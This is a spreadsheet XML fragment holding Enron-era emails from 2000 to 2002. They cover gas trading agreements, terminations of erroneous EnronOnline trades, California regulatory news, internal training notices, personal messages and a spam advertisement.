17=091/4/01=09Houston Pipe Line CO. Spot GTC=09Houston Pipe Line Co.=09PG&amp;E=_x000D_
 Energy Trading =01)=20_x000D_
Gas Corp.=09Physical=20_x000D_
=09=09=09=09=09Gas_x000D_
18=094/1/98=09Enfolio Master Firm Purchase Agreement=09EES=09PG&amp;E Energy Tr=_x000D_
ading-Gas Corp.=09Physical=20_x000D_
=09=09=09=09=09Gas_x000D_
19=0911/1/97=09Master Firm Gas Purchase/ Sale Agreement=09EEMC=09PG&amp;E Energ=_x000D_
y Trading-Gas Corp.=09Physical=20_x000D_
=09=09=09=09=09Gas_x000D_
=09=09=09=09=09_x000D_
_x000D_
_x000D_
Cordially,_x000D_
Mary Cook_x000D_
Enron North America Corp._x000D_
1400 Smith, 38th Floor, Legal_x000D_
Houston, Texas   77002-7361_x000D_
(713) 345-7732 (phone)_x000D_
(713) 646-3490 (fax)_x000D_
mary.cook@enron.com</t>
  </si>
  <si>
    <t>Fri, 13 Apr 2001 08:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/13/01; HourAhead hour: 16;  HourAhead schedule download failed. _x000D_
Manual intervention required._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041316.txt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_x000D_
!!!Could not find object._x000D_
Unrecognized database format 'R:\EnpowerCAPS\CAPS97DATA.mdb'._x000D_
General SQL error._x000D_
Table</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 04:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: Request Termination Agreements for 4 EnronOnline_x000D_
 Transactions W/ ATTACHMENT</t>
  </si>
  <si>
    <t xml:space="preserve">The trades are all similar so here goes:_x000D_
_x000D_
Fixed Price Payer (Buyer)  Coral Energy Holding, L.P. ((EnronOnline Deal _x000D_
#1150351)_x000D_
     Morgan Stanley Capital Group Inc.  (EnronOnline Deal #1150406)_x000D_
     Morgan Stanley Capital Group Inc.  (EnronOnline Deal #1150411)_x000D_
     Morgan Stanley Capital Group Inc.  (EnronOnline Deal #1150426)_x000D_
_x000D_
Floating Price Payer(Seller)  Enron North America Corp._x000D_
Deal Date    4/20/01_x000D_
Effective Date    10/1/01_x000D_
Termination Date   10/31/01_x000D_
Notional Quantity   5,000 MMBtu per day_x000D_
Fixed Price    Last Day of NYMEX plus $0.3700_x000D_
Floating Price    The applicable Determination Period Bidweek Average Price _x000D_
in the _x000D_
     row entitled "Malin" located in the "California" section of the table _x000D_
entitled _x000D_
     "Spot Gas Prices" in the first issue of Natural Gas Intelligence Weekly _x000D_
     Gas Price Index for the applicable Determination Period_x000D_
     or, simply stated_x000D_
     NGI - Malin_x000D_
Commodity    Natural Gas_x000D_
_x000D_
If I forgot something, please let me know.  _x000D_
_x000D_
How is Karen Lambert by the way?  Has she been on vacation lately?_x000D_
  _x000D_
_x000D_
_x000D_
From: Tana Jones on 04/25/2001 10:05 AM_x000D_
To: Bob Bowen/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FW: Request Termination Agreements for 4 EnronOnline Transactions W/ _x000D_
ATTACHMENT_x000D_
_x000D_
Attached is a list of four deals for some online "oops" trades.  Can you send _x000D_
me the deal particulars so I can prepare terminations of the trades._x000D_
----- Forwarded by Tana Jones/HOU/ECT on 04/25/2001 10:04 AM -----_x000D_
_x000D_
	Robert B Cass/ENRON@enronXgate_x000D_
	04/25/2001 09:50 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: Jennifer deBoisblanc Denny/ENRON@enronXgate_x000D_
		 Subject: FW: Request Termination Agreements for 4 EnronOnline Transactions _x000D_
W/ ATTACHMENT_x000D_
_x000D_
Tana -_x000D_
This e-mail includes the attachment.  It "fell off" my e-mail from last night._x000D_
_x000D_
Thanks -_x000D_
Rob_x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Cass, Robert B.  _x000D_
Sent: Tuesday, April  24, 2001 6:29 PM_x000D_
To: Jones, Tana_x000D_
Cc: Moorer, Torrey; Denny, Jennifer; Thomas, Sheri_x000D_
Subject: Request Termination Agreements for 4 EnronOnline Transactions_x000D_
_x000D_
_x000D_
Hi Tana -  _x000D_
_x000D_
We need your assistance in preparing termination letters for the transactions _x000D_
listed on the attached spreadsheet and described as follows:_x000D_
_x000D_
On Friday, April 20, 2001, four transactions occurred on EnronOnline that _x000D_
were in error.  One transaction was with Coral Energy Holding L.P. and three _x000D_
transactions were with Morgan Stanley Capital Group, Inc.  As mutually agreed _x000D_
to by both the Enron commercial team and the respective counterparties, it _x000D_
was decided that each of the four transactions would not be confirmed and _x000D_
should be terminated.  _x000D_
_x000D_
The exact specifics are detailed as follows:_x000D_
_x000D_
? The transactions occurred due to an inadvertent entry in the actual _x000D_
production system of EnronOnline by a Product Control Group member, Melba _x000D_
Lozano.  Melba activated a product assuming that she was in the EnronOnline _x000D_
test system of EnronOnline.  _x000D_
_x000D_
? The product transacted upon is normally managed by Frank Ermis.  However, _x000D_
in his absence on Friday, the product was managed by Matt Lenhart._x000D_
_x000D_
? Steve South, trader on the West Desk, called and notified both Morgan and _x000D_
Coral that the product had been posted in error.  All parties agreed that the _x000D_
transactions were not reflective of the normal pricing.  As a result they _x000D_
further agreed that transaction confirmations would not be necessary and that _x000D_
the deals would be "killed" on all sides.  (For reference of any telephone _x000D_
tapes that may need to be pulled, the conversations with the counterparties _x000D_
occurred around 2:00 pm.)_x000D_
_x000D_
? No confirmations were generated as a result of the killing of the _x000D_
transactions in TAGG._x000D_
_x000D_
? I spoke with Mike Grigsby on Monday (April 23, 2001) and advised him that _x000D_
termination letters may be required by Legal.  He responded that he had no _x000D_
problem with that._x000D_
_x000D_
Tana, please advise if additional information is required to complete the _x000D_
termination letters or if another course of action is warranted._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Rob Cass_x000D_
x35491 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 21 Jun 2001 00:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marty.sunde@enron.com', 'vicki.sharp@enron.com', 'john.lavorato@enron.com', 'tim.belden@enron.com', 'don.black@enron.com', 'richard.shapiro@enron.com', 'michael.tribolet@enron.com', 'greg.whalley@enron.com', 'wanda.curry@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>DA Suspension in California</t>
  </si>
  <si>
    <t xml:space="preserve">Our outside Regulatory Counsel has heard that the CPUC will definitely vote _x000D_
to suspend direct access on June 28 effective July 1.  We will be working _x000D_
through formal comments and informal discussions to clarify the meaning of _x000D_
the this suspension._x000D_
_x000D_
We are still working to try and modify the Proposed Decisions as they relate _x000D_
to the PX Credit receivable, with our primary focus on removing this part of _x000D_
the decision from a vote on June 28._x000D_
_x000D_
Jim_x000D_
_x000D_
---------------------- Forwarded by James D Steffes/NA/Enron on 06/21/2001 _x000D_
07:41 AM ---------------------------_x000D_
From: Harry Kingerski on 06/20/2001 05:44 PM_x000D_
To: Marty Sunde/HOU/EES@EES, Dennis Benevides/HOU/EES@EES, Lamar _x000D_
Frazier/HOU/EES@EES, Don Black/HOU/EES@EES, James W Lewis/HOU/EES@EES, Jeremy _x000D_
Blachman/HOU/EES@EES, Scott Gahn/HOU/EES@EES, Dan Leff/HOU/EES@EES, Vicki _x000D_
Sharp/HOU/EES@EES, Scott Stoness/HOU/EES@EES, Tim Belden/HOU/ECT@ECT, Janet R _x000D_
Dietrich/HOU/EES@EES, David W Delainey/HOU/EES@EES, Mike D Smith/HOU/EES@EES_x000D_
cc: James D Steffes/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Susan J _x000D_
Mara/NA/Enron@ENRON, Jeff Dasovich/NA/Enron@Enron, Mark _x000D_
Palmer/Corp/Enron@ENRON, Karen Denne/Corp/Enron@ENRON, Janel _x000D_
Guerrero/Corp/Enron@Enron, Jennifer Thome/NA/Enron@Enron _x000D_
_x000D_
Subject: DA Suspension in California_x000D_
_x000D_
Mike Day just called to say he has heard the California PUC definitely will _x000D_
vote on June 28 to suspend direct access, effective July 1, except for _x000D_
written contracts executed prior to July 1, 2001.    Suspension of DA has _x000D_
been identified by the Governor as a necessary prerequisite to bond _x000D_
issuance.  _x000D_
</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 05:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'muaa@mizzou.com'})</t>
  </si>
  <si>
    <t>Ag Alumni Homecoming Hospitality</t>
  </si>
  <si>
    <t>Join the fun and festivities at the Ag Alumni Homecoming Hospitality Tent_x000D_
on Saturday, October 14, 2000.  Stop by the tent with the Ag Alumni banner_x000D_
on the south side of the Hearnes Center.  Festivities will start at 11:00_x000D_
a.m. (kickoff is at 1:00); hot dogs, chips, cookies and beverages will be_x000D_
furnished._x000D_
_x000D_
Don't miss this opportunity to visit with other Ag alumni!  We look_x000D_
forward to seeing you October 14!_x000D_
_x000D_
For a list of other Homecoming activities visit_x000D_
http://www.mizzou.com/homecoming/index.htm._x000D_
_x000D_
_x000D_
This message is brought to you by the MU Alumni Association in an effort_x000D_
to better inform our alumni of Mizzou events._x000D_
_x000D_
If your address has changed or you prefer not to receive email_x000D_
notifications, please contact the MU Alumni Association at_x000D_
muaa@mizzou.com or (800) 372-6822._x000D_
_x000D_
Become a registered user of the MU Alumni Association website. Only MUAA_x000D_
members may register to access our online directory, post class notes and_x000D_
business cards. Register right now at:_x000D_
http://www.mizzou.com/firsttimeuser.htm</t>
  </si>
  <si>
    <t>Wed, 16 Aug 2000 01:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Lotus Notes - Brokerage Agreements</t>
  </si>
  <si>
    <t>Sam:  Please get on my calendar for Friday.  We need to update agreements, _x000D_
status, etc.  Also, we need to add a "Futures Agreement" designation to Lotus _x000D_
Notes.  Please bring your latest printouts for existing agreements and _x000D_
provide a copy for me.  Let's take about an hour.  Thanks.  Sara_x000D_
_x000D_
ps  Also, if you have any questions about masters, etc., bring them along!</t>
  </si>
  <si>
    <t>FW: ORA's Opening Testimony in A.99-03-014, PG&amp;E GRC-2</t>
  </si>
  <si>
    <t>I am assuming that we are pretty much out of this case._x000D_
_x000D_
_x000D_
Jeanne_x000D_
-----Original Message-----_x000D_
From: Blunt, Christopher J. [mailto:cjb@cpuc.ca.gov]_x000D_
Sent: Friday, September 01, 2000 3:59 PM_x000D_
To: Sid, Fannie; 'kmccrea@sablaw.com'; 'jogg@jhenergy.com';_x000D_
'defrawis@efaches.navfac.navy.mil'; 'glenn.camus@southernenergy.com';_x000D_
'rcsstl@cdmnet.com'; 'mbrubaker@consultbai.com'; 'anchau@shellus.com';_x000D_
'napedersen@jonesday.com'; 'athomas@newenergy.com'; 'reedba@sce.com';_x000D_
'vthompson@sempra.com'; 'jhay@sempra.com'; 'kmelville@sempra.com';_x000D_
'mcbyer@earthlink.net'; 'ronknecht@aol.com'; 'kkouba@ames.arc.nasa.gov';_x000D_
'furutanj@efawest.navfac.navy.mil'; 'mdjoseph@adamsbroadwell.com';_x000D_
'bfinkelstein@turn.org'; Farrar, Darwin; Bromson, Jonathan;_x000D_
'theresa_mueller@ci.sf.ca.us'; 'dgrueneich@gralegal.com';_x000D_
'bdunlop@gralegal.com'; 'phanschen@mofo.com'; 'epoole@adplaw.com';_x000D_
'eke@aelaw.com'; 'jbennett@gmssr.com'; 'saw0@pge.com'; 'ssmyers@hooked.net';_x000D_
'kfyip@seiworldwide.com'; 'wbooth@booth-law.com'; 'mgomez1@bart.gov';_x000D_
'brbarkovich@earthlink.net'; 'philm@scdenergy.com'; 'scottst@mid.org';_x000D_
'bill@jbsenergy.com'; 'rmccann@cal.net'; 'blaising@braunlegal.com';_x000D_
'jsole@caiso.com'; 'jweil@aglet.org'; 'lwhouse@el-dorado.ca.us';_x000D_
'abb@eslawfirm.com'; 'dpk@cipa.org'; 'dcarroll@dbsr.com';_x000D_
'dkk@eslawfirm.com'; 'dkk@eslawfirm.com'; 'bradylaw@pacbell.net';_x000D_
'lmh@eslawfirm.com'; 'pstohr@dbsr.com'; 'jtacher@energy.state.ca.us';_x000D_
'kmills@cfbf.com'; 'ron_oechsler@rmiinc.com'; 'aorchar@smud.org';_x000D_
'mpa@aelaw.com'; 'dws@keywaycorp.com'; 'mward@sempra.com';_x000D_
'fosterbc@sce.com'; 'marcel@turn.org'; 'phanschen@mofo.com';_x000D_
'joeyoung@ebmud.com'; 'rschmidt@bartlewells.com'; 'luluw@newsdata.com';_x000D_
'rbw@mrwassoc.com'; 'dmarcus@slip.net'; 'cabaker@duke-energy.com';_x000D_
'Slayman@energy.state.ca.us'; 'jdh@eslawfirm.com'; 'karen@klindh.com';_x000D_
'huse@eesconsulting.com'; Lafrenz, Donald J.; Martin, Laura A.; Ramirez,_x000D_
Manuel; Gottstein, Meg; Campbell, Rod A.; White, Rosalina; Liang-Uejio,_x000D_
Scarlett; 'gottstein@volcano.net'; 'mjaske@energy.state.ca.us'_x000D_
Cc: Danforth, Christopher; McNamara, Michael D.; Cauchois, Scott; Don Smith;_x000D_
Jonathan Bromson; Louise Huen; Roy Evans; Scarlett Liang-Uejio; Sean Casey;_x000D_
Troid Edwards; William Gibson_x000D_
Subject: ORA's Opening Testimony in A.99-03-014, PG&amp;E GRC-2_x000D_
_x000D_
_x000D_
_x000D_
According to an ALJ Ruling dated 7/28/00, ORA submits an electronic copy of_x000D_
its Opening Testimony in PG&amp;E's GRC-2, A.99-03-014.  Also attached are the_x000D_
tables associated with Chapter Nos. 4 and 8.  ORA is also mailing a hard_x000D_
copy of its Opening Testimony to the service list.  If you have any_x000D_
questions please contact Chris Blunt at (415) 703-1779._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - ORA's Opening Testimony PGE GRC2 9100.doc_x000D_
 - Table 8-1 xls.msg_x000D_
Message-ID: &lt;B5A43EE0E828D411A04500005A42A7B13D708B@exchserver4.cpuc.ca.gov&gt;_x000D_
From: "Liang-Uejio, Scarlett" &lt;scl@cpuc.ca.gov&gt;_x000D_
To: "Blunt, Christopher J." &lt;cjb@cpuc.ca.gov&gt;_x000D_
Subject: ORA CH. 4 TABLES 90100.xls_x000D_
Date: Fri, 1 Sep 2000 15:00:39 -0700_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2650.21)_x000D_
Content-Type: multipart/mixed; _x000D_
boundary="----_=_NextPart_002_01C01771.9CF73C70"_x000D_
_x000D_
For electronic mailing._x000D_
_x000D_
&lt;&lt;ORA CH. 4 TABLES 90100.xls&gt;&gt;_x000D_
_x000D_
_x000D_
 - ORA CH. 4 TABLES 90100.xls</t>
  </si>
  <si>
    <t>Fri, 14 Dec 2001 14:17:12 -0800 (PST)</t>
  </si>
  <si>
    <t>Pay Check Stubs</t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
Please stop HR to pick up your paycheck stub.  Thanks!_x000D_
_x000D_
Julie K_x000D_
x7404</t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 02:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steven_t_sweet@calpx.com'})</t>
  </si>
  <si>
    <t>frozenset({'market_participant_hj1@calpx.com', 'market_participant_uz1@calpx.com', 'market_participant_mn2@calpx.com', 'market_participant_eg2@calpx.com', 'market_participant_kl2@calpx.com', 'market_participant_eg1@calpx.com', 'market_participant_cd2@calpx.com', 'market_participant_mn1@calpx.com', 'market_participant_or2@calpx.com', 'market_participant_ab1@calpx.com'})</t>
  </si>
  <si>
    <t>Important Notice - Inter-SC Trades with Adjustment Bid Update_x000D_
 (Stage 6.7)</t>
  </si>
  <si>
    <t xml:space="preserve">** REMINDER**_x000D_
_x000D_
Trade Application_x000D_
_x000D_
The final version of the trade application for the launch of State 6.7 will be_x000D_
posted behind the Participants only section in the folder entitled "Inter-SC_x000D_
Trades" on Monday, September 18th.  We anticipate this will be the final _x000D_
version_x000D_
of the trade application prior to launch.  We will send a market message when_x000D_
the trade application is ready for download._x000D_
_x000D_
Market Simulation_x000D_
_x000D_
This is our final week of market simulation. As of late Friday afternoon, we _x000D_
had_x000D_
not been given any information regarding additional testing with the ISO _x000D_
direct,_x000D_
however they have made the emmunlator available to us to turn schedules _x000D_
around._x000D_
_x000D_
NOTE: If you have not taken the opportunity to test your systems against the_x000D_
trade application during previous market simulation days, we encourage you to_x000D_
test with the trade application being posted today sometime this week._x000D_
_x000D_
Inter-SC Resource_x000D_
_x000D_
All Inter-SC Resources must be entered into PowerBase prior to 5:00 PM on_x000D_
Friday, September 22, 2000.  Please forward all requests for resources to _x000D_
Steven_x000D_
Sweet at stsweet@calpx.com prior to Friday.  Steven can be reached at (626)_x000D_
537-3264._x000D_
_x000D_
DATA FREEZE_x000D_
_x000D_
In preparation for the launch of Stage 6.7, there will be a data freeze_x000D_
effective September 24th through October 11th.  To ensure the stability of our_x000D_
system, we will not be able to effect any changes to your resources during _x000D_
that_x000D_
time.  If you have any questions regarding the freeze, you can contact me at_x000D_
(626) 537-3263._x000D_
_x000D_
Conference Call_x000D_
_x000D_
We will have a conference call on Wednesday, September 27, 2000 to discuss_x000D_
launch status and to review the changeover schedule for the new environment._x000D_
Call information is as follows:_x000D_
_x000D_
Date:          Wednesday, September 27, 2000_x000D_
_x000D_
Time:          1:00 PM_x000D_
_x000D_
Duration: 1/2 hour_x000D_
_x000D_
Phone #:  (888) 452-9851_x000D_
_x000D_
Passcode: Release 6.7_x000D_
_x000D_
Leader:        Cleo Center_x000D_
_x000D_
Materials for the call will be forwarded to you for your review prior to the_x000D_
call._x000D_
_x000D_
We look forward to your participation and to a smooth and successful launch._x000D_
_x000D_
We appreciate your continued support._x000D_
_x000D_
Thank you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Sep 2000 07:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Russ, _x000D_
_x000D_
I would like for the following people from the Texas region to attend:_x000D_
_x000D_
Liz Bellamy_x000D_
Sabrae Zajak_x000D_
Mary Poorman_x000D_
Susan Hadix_x000D_
Tom Acton_x000D_
Mark McCoy _x000D_
Eddie Janzen_x000D_
_x000D_
Let me know if this group is too large and move some to a later date.  Thanks._x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Russ Severson_x000D_
09/08/2000 08:53 AM_x000D_
To: George Smith/HOU/ECT@ECT, Tricia Bowen/HOU/ECT@ECT, Victor _x000D_
Lamadrid/HOU/ECT@ECT, Daren J Farmer/HOU/ECT@ECT, Patti Sullivan/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: SITARA TRAINING_x000D_
_x000D_
I will be giving a training session on Wed   9/13/00  in 21C2 from 3:00-4:30 _x000D_
pm._x000D_
I would like for you to send to the class any new logistics personnel that _x000D_
you might think could use a Sitara overview._x000D_
If someone cannot make it at this time, let me know their names and I will _x000D_
try to schedule something for them at a later time._x000D_
_x000D_
If possible, please send me a note on who might be attending, so I can get an _x000D_
approximate head count._x000D_
_x000D_
Call me or e-mail me if you have any questions_x000D_
_x000D_
Russ_x000D_
x37386_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 9 Apr 2002 06:57:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Matt's new job</t>
  </si>
  <si>
    <t>Have not heard from newphew yet.  Here is more scoop from Matt_x000D_
_x000D_
Trogg 522: grrrrrr_x000D_
mbfleming3: still working on my title.  i will be marketing their existing assets and then any discoveries they have looking to find markets for it and also they are wanting to become more marketing oriented as opposed to just trading their existing supply_x000D_
_x000D_
Trogg 522: WOW, you ARE the MAN._x000D_
mbfleming3: great group.  not very biga nd not very fat (very flat org chart)_x000D_
_x000D_
Trogg 522: Well congradulations.  I'm sure I'll love having you as a new boss._x000D_
mbfleming3: what was your name again_x000D_
_x000D_
Trogg 522: shoe shine and car wash boy_x000D_
mbfleming3: well, that means that you will have to come out my way sometime so i can buy you some lunch_x000D_
Trogg 522: Don't you worry.  I'll be there._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Immer, Ingrid" &lt;Ingrid.Immer@Williams.com&gt;@ENRON  _x000D_
Sent:	Tuesday, April 09, 2002 8:53 AM_x000D_
To:	Germany, Chris_x000D_
Subject:	RE: Matt's new job_x000D_
_x000D_
That's great!  Sounds like a good job, too.  Tell him I'm very happy for_x000D_
him._x000D_
_x000D_
Has Chad called you this morning?  He called around 7:00 at home.  I told_x000D_
him to call you at the office about when/where to meet tonight._x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	Germany, Chris [SMTP:Chris.Germany@enron.com]_x000D_
&gt; Sent:	Tuesday, April 09, 2002 8:40 AM_x000D_
&gt; To:	Ingrid Immer (E-mail)_x000D_
&gt; Subject:	Matt's new job_x000D_
&gt;_x000D_
&gt; Matt has a new job, following is our IM conversation._x000D_
&gt;_x000D_
&gt; mbfleming3: yo_x000D_
&gt; Trogg 522: Buddy_x000D_
&gt;_x000D_
&gt; mbfleming3: hows the week going for you_x000D_
&gt; Trogg 522: i'm so so tired_x000D_
&gt; Trogg 522: i want to go to sleep in the worst way._x000D_
&gt;_x000D_
&gt; mbfleming3: take a day odd_x000D_
&gt; mbfleming3: off_x000D_
&gt; Trogg 522: no no no, i do like to take fridays off though_x000D_
&gt;_x000D_
&gt; mbfleming3: fridays would be better_x000D_
&gt; mbfleming3: so my job search is over._x000D_
&gt; Trogg 522: yes sir, i mite do that too. REALLY_x000D_
&gt; Trogg 522: so whats the scoop_x000D_
&gt; Trogg 522: you are going to work for barer rite_x000D_
&gt;_x000D_
&gt; mbfleming3: going to work for marathon oil_x000D_
&gt; Trogg 522: barker_x000D_
&gt; Trogg 522: cool, where are they_x000D_
&gt; Trogg 522: when do you start_x000D_
&gt; Trogg 522: what are you going to be doing_x000D_
&gt; Trogg 522: can i tell everyone_x000D_
&gt;_x000D_
&gt; mbfleming3: one at a time_x000D_
&gt; Trogg 522: oh don't worry, i wrote them all one at a time_x000D_
&gt;_x000D_
&gt; mbfleming3: i meant one question at a time_x000D_
&gt; mbfleming3: they are off of san felipe in the galleria_x000D_
&gt; mbfleming3: i start next monday/tuesday_x000D_
&gt; Trogg 522: how many people are you echattig with at this moment?  STOP IT_x000D_
&gt; and answer my questions_x000D_
&gt;_x000D_
&gt; mbfleming3: i was on the phone_x000D_
&gt; Trogg 522: oh, ok_x000D_
&gt;_x000D_
&gt; mbfleming3: i will be starting a new group doing business develp and_x000D_
&gt; marketing_x000D_
&gt; Trogg 522: can i tell everyone?_x000D_
&gt; Trogg 522: or do you want to do that._x000D_
&gt;_x000D_
&gt; mbfleming3: you can tell people_x000D_
&gt; Trogg 522: so what is your tittttle_x000D_
&gt; Trogg 522: New Group?   what business are you going to develope?_x000D_
&gt;_x000D_
&gt; mbfleming3: phone call please hold_x000D_
&gt; Trogg 522: grrrrrr_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; **********************************************************************_x000D_
&gt; This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_
&gt; and may contain confidential and privileged material for the sole use of_x000D_
&gt; the intended recipient (s). Any review, use, distribution or disclosure by_x000D_
&gt; others is strictly prohibited. If you are not the intended recipient (or_x000D_
&gt; authorized to receive for the recipient), please contact the sender or_x000D_
&gt; reply to Enron Corp. at enron.messaging.administration@enron.com and_x000D_
&gt; delete all copies of the message. This e-mail (and any attachments hereto)_x000D_
&gt; are not intended to be an offer (or an acceptance) and do not create or_x000D_
&gt; evidence a binding and enforceable contract between Enron Corp. (or any of_x000D_
&gt; its affiliates) and the intended recipient or any other party, and may not_x000D_
&gt; be relied on by anyone as the basis of a contract by estoppel or_x000D_
&gt; otherwise. Thank you._x000D_
&gt; **********************************************************************</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 07:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'laura.schwartz@enron.com'})</t>
  </si>
  <si>
    <t>Re: CARE</t>
  </si>
  <si>
    <t xml:space="preserve">I think it is great!  When is the best time for me to make my contribution?  _x000D_
On the radio show or before?  _x000D_
_x000D_
_x000D_
_x000D_
	Laura Schwartz@ENRON_x000D_
	12/11/2000 04:07 PM_x000D_
		 _x000D_
		 To: Elyse Kalmans/Corp/Enron@ENRON, Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: CARE_x000D_
_x000D_
This is what is running on eTV to promote our effort._x000D_
_x000D_
Laura_x000D_
 - KRBE.exe _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Mar 2001 10:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cuz2130@hotmail.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Dad told about you changing the ticket, but thanks._x000D_
_x000D_
Um, i look forward to hearing about this little accident (at least  i hope it _x000D_
was little)._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Jonathan Smith" &lt;cuz2130@hotmail.com&gt; on 03/14/2001 06:08:26 PM_x000D_
To: matt.smith@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
yo yo_x000D_
_x000D_
sorry i didn't write this sooner.  it sort of slipped my mind, i think _x000D_
because it went so smoothly.  so, yes, i changed the ticket and everything _x000D_
is all set.  i did have to put the $100 on my credit card, but don't worry _x000D_
about it._x000D_
_x000D_
later-_x000D_
_x000D_
jonathan_x000D_
_x000D_
ps i got in another car accident that i didn't cause but still got blamed _x000D_
for it.  but we'll get into another time._x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Jan 2000 09:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bryan.hull@enron.com', "o'neal.winfree@enron.com", 'david.baumbach@enron.com', 'michael.walters@enron.com'})</t>
  </si>
  <si>
    <t>NEW SITARA RISK ASSIGNMENT DEMOS</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 01/11/2000 05:25 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Thomas Engel                           01/11/2000 05:10 PM_x000D_
	_x000D_
_x000D_
To: William Kelly/HOU/ECT@ECT, Mark Friedman/HOU/ECT@ECT, Jeffrey C _x000D_
Gossett/HOU/ECT@ECT, Eric Bass/HOU/ECT@ECT, Scotty Gilbert/HOU/ECT@ECT, Chuck _x000D_
Kent/Corp/Enron@ENRON, Kathryn Cordes/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: NEW SITARA RISK ASSIGNMENT DEMOS_x000D_
_x000D_
_x000D_
Please forward to your respective personnel._x000D_
_x000D_
There will be 2 demos of the New SITARA Risk Assignment release this Thursday _x000D_
(Jan 13) in room EB 2537 from 11:15-12:15, and 1:00-2:00._x000D_
_x000D_
There will be additional demos for the general SITARA population the _x000D_
following week; however, since these changes effect you the most,  I highly _x000D_
recommend you attempt to make one of the sessions this week.   We planning on _x000D_
rolling the new changes out the weekend of Jan 22.   These are some major _x000D_
changes that will effect every deal with risk assignment._x000D_
_x000D_
Please make every effort to attend.  _x000D_
_x000D_
If you currently enter deals with risk assignment - hands on training can be _x000D_
arranged.  Also, we will be available to assist you as needed after _x000D_
implementation._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 07:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Northwestern pdf</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Ben Jacoby/HOU/ECT on 03/13/2001 03:55 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
	Lorie Leigh_x000D_
	03/13/2001 01:55 PM_x000D_
	_x000D_
To: Ben F Jacoby/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Northwestern pdf_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 2 Feb 2002 12:47:35 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mediatrec@emailfactory.net'})</t>
  </si>
  <si>
    <t>Are You Single?  Don't be alone on Valentines Day.</t>
  </si>
  <si>
    <t>Saturday, February 2, 2002_x000D_
_x000D_
ARE YOU SINGLE?_x000D_
_x000D_
Visit the web's favorite meeting place._x000D_
_x000D_
Thousands and thousands of people are developing quality relationships_x000D_
_x000D_
at this very moment...all from the comfort and safety of home. Click_x000D_
_x000D_
this link to create a FREE profile on Dream Mates and meet that special_x000D_
_x000D_
someone right now!_x000D_
_x000D_
http://www.emailfactory.com/redirect.cfm?key=7B232067DBF144EB889C646E6612B481-25532-1239&amp;redirect=www.dreammates.com/index.cfm?aid=452685_x000D_
_x000D_
_x000D_
-----------------------------------------------------------------------_x000D_
-----------------------------------------------------------------------_x000D_
_x000D_
This email sent by http://www.EmailFactory.com_x000D_
The Web-Based Precision Opt-In Email Marketing Solution._x000D_
_x000D_
----------------------------------------------------------------------------_x000D_
----------------------------------------------------------------------------_x000D_
To UNSUBSCRIBE from this mailing list:_x000D_
_x000D_
Reply to this message with the word 'unsubscribe' as the subject_x000D_
_x000D_
 OR_x000D_
_x000D_
To UNSUBSCRIBE from this mailing list, go to:_x000D_
_x000D_
http://bye.emf3.com/handler.cfm?idAddress=L3363056607.25532_x000D_
----------------------------------------------------------------------------_x000D_
----------------------------------------------------------------------------</t>
  </si>
  <si>
